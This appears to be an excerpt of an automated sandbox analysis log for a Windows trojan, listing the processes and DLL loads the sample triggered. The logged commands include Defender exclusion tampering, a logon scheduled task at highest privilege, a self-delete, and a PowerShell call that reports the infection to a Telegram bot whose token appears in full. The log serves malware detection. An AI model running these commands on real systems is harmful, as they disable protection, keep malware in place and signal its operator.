    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});"
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: libcurl.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: zlib1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: libcurl.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: zlib1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: printui.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: libcurl.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: zlib1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libpq.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libssl-3-x64.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libintl-9.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libwinpthread-1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: libiconv-2.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\bav64.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
